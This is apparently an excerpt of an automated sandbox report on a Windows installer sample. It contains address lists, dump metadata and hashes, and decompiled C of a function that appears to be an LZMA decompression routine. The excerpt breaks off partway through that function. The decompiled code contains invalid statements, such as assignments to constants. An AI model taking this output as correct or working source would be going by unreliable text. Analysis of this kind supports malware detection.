                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00000000
                      0x0040676f
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x00000000
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068d2
                      0x004068d8
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00406811
                      0x00000000
                      0x00406686

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                      • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                      • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                      • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406398, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
